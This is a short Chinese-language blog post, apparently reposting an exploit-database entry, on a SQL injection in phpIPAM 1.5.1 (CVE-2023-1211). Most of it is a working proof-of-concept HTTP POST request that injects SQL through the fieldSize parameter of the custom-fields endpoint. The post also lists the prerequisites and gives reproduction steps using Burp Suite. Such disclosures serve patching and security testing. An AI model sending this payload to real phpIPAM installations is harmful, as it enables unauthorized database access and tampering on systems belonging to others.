phpIPAM 1.5.1 SQL注入漏洞分析与利用

本文详细分析了phpIPAM 1.5.1版本中存在的SQL注入漏洞(CVE-2023-1211),提供了完整的漏洞原理、利用条件、PoC(概念验证)代码和手动复现步骤。

Exploit 标题: phpIPAM 1.5.1 - SQL 注入

日期: 2025-11-25

Exploit 作者: CodeSecLab

供应商主页: https://github.com/phpipam/phpipam/

软件链接: https://github.com/phpipam/phpipam/

版本: 1.5.1

测试平台: Windows

CVE : CVE-2023-1211

概念验证 (Proof Of Concept)

1
2
3
4
5
6
POST /app/admin/custom-fields/edit-result.php HTTP/1.1
Host: phpipam
Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token>
Content-Type: application/x-www-form-urlencoded

csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES

先决条件:

  1. 有效的已认证会话(PHPSESSID cookie)
  2. 有效的 CSRF 令牌(首先从 /admin/custom-fields/ 页面获取)
  3. 目标表必须存在(使用默认的‘devices’表)
  4. 字段类型必须为 enum/set 才能到达易受攻击的代码路径

手动测试步骤:

  1. 登录 phpIPAM
  2. 访问 /admin/custom-fields/ 以获取 CSRF 令牌
  3. 使用上述载荷发送 POST 请求

注意:<valid_session_id><valid_csrf_token> 替换为来自已认证会话的实际值。fieldSize 参数通过 enum/set 类型定义上下文注入 SQL。

复现步骤

  1. 以管理员用户身份登录。
  2. 使用 Burp Suite 等 Web 代理工具拦截并发送恶意请求,确保其中包含有效的会话 cookie 和 csrf 令牌。
  3. 观察结果。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计